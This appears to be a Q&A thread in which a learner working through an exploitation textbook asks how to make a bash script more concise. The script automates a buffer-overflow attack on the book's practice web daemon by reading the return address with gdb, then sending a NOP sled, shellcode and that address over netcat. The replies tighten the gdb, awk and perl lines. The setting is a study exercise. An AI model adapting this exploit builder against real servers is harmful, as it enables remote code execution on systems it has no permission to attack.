# Can this bash script be more concise?

Tags: security, bash, shell, gdb

Main Point: Can this script be cleaner and more concise?

So I'm working through Art of Exploitation by Erickson, and he walks through the development of an automated tool to make the exploitation of his tinywebserver daemon faster.

However, on Ubuntu 10.04, the Return Address changes each time the daemon is restarted. I adjusted the script to automate getting the return address from GDB. I've never done any scripting before, and the script below works, but I was wondering if it could be cleaner, especially the GDB line.

Basically, I start the daemon, then get the pid. Then I automate running GDB in order to get the correct return address. This gets saved to a logfile.

I use cut to get the return address, sed to space it, and awk to format it properly for the shellcode.

Everything else is from the book.

Any feedback on the gdb line and the cut/sed/awk lines?

Thanks for any advice.

```
#!/bin/sh
# a tool for exploiting tinywebd

if [ -z "$2" ]; then  # if argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi 

./tinywebd
pid=$(pidof tinywebd)

OFFSET=524  # changed to work on eve

#RETADDR="\xe4\x9a\xd2\xbf" # 
sudo gdb -q -pid=$pid --symbols=./tinywebd --batch -ex "break 86" 
--batch -ex "c"--batch -ex "set logging on gdblog" --batch -ex "x/x request+100"
--batch -ex "set logging off" --batch -ex "quit"

RETADDR=$(cut -d: -f1 gdblog | sed 's/\(.\{2\}\)/\1 /g' | 
awk '{ print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}')
rm -f gdblog

echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))

echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr ($((4*32)) 
bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
 perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80
```

Comment: You're missing backslashes on the end of the `sudo` line and the next line.  You should `exit 1` when reporting an error; the script did not succeed.  You can avoid the `cut` in the `SIZE` evaluation with `wc -c < $1`.

Comment: If you use `awk` in a pipeline, you can usually more elegantly subsume all the functionality of lesser tools like `grep`, `cut`, `sed` etc in the `awk` script.

Comment: The `(perl; cat; perl)` combo can be replaced with a single Perl script with `BEGIN` and `END` actions, and just a `print;` in the middle.

Comment: @jonathanleffler- tracking, i copy pasted it straight from the script, in the script its all one line, its broke into multiple lines here for readabilities sake, hence no "/".

Comment: @tripleee - hence my question. this is the first time ive come up with my own sed/awk pipes, thats why i was asking for some feedback. could you give an example of what you mean by combining it all? or at least a good awk reference to study?

Answer (score 1):

```
cut -d: -f1 gdblog | sed 's/\(.\{2\}\)/\1 /g' | awk '{ print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}'
```

seems to be equivalent to perl one-liner:

```
perl -ple '$_=join"",map"\\x$_",(/(..)/g)[4,3,2,1]' gdblog
```

Comment: not sure if it changes anything, but here is what is in the gdblog file.

0xbfff4567:    0x08041245

made up numbers, but thats what the output looks like. Im interested in just the bfff4567 part, so i cut everything past the :, then use sed to enter spaces, then awk to reverse and print each part of the address into the following-

\x67\x45\xff\xbf

from the research i did before writing this, it seemed like perl was developed from sed/awk. is it true to say you can use perl to replace sed/awk completely...? also, do you know any good perl reference manuals?

Comment: Perl has bortowed features and ideas from `sed` and `awk` ... and Lisp and C and BASIC and a whole lot of other places. It's significantly more powerful and complex than the traditional text-processing script languages on Unix. Google is shock full of resources, but try http://perl.org/ for a start.

Comment: For an `awk` alternative, try `awk '{ for (i=9; i>2; i-=2) printf("\\x%s", substr($1,i,2)) }' gdblog`.  It's slightly longer than the Perl version but also IMHO more readable.

Answer (score 1):

The gdb line can be shortened:

```
sudo gdb -batch -ex "break 86" -ex c -ex "set logging on gdblog" -ex "x/x request+100" -ex quit ./tinywebd $pid
```

- -batch implies -q and is needed once-only
- "set logging off" is unnecessary at the end
- executable and PID can be specified without options

If your awk supports the FIELDWIDTHS variable, we can easily do without cut and sed:

```
RETADDR=$(awk -v FIELDWIDTHS="2 2 2 2 2" '{print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}' gdblog)
```

Or, even if it doesn't:

```
RETADDR=$(awk '{gsub("..", "& "); print "\\x"$5"\\x"$4"\\x"$3"\\x"$2}' gdblog)
```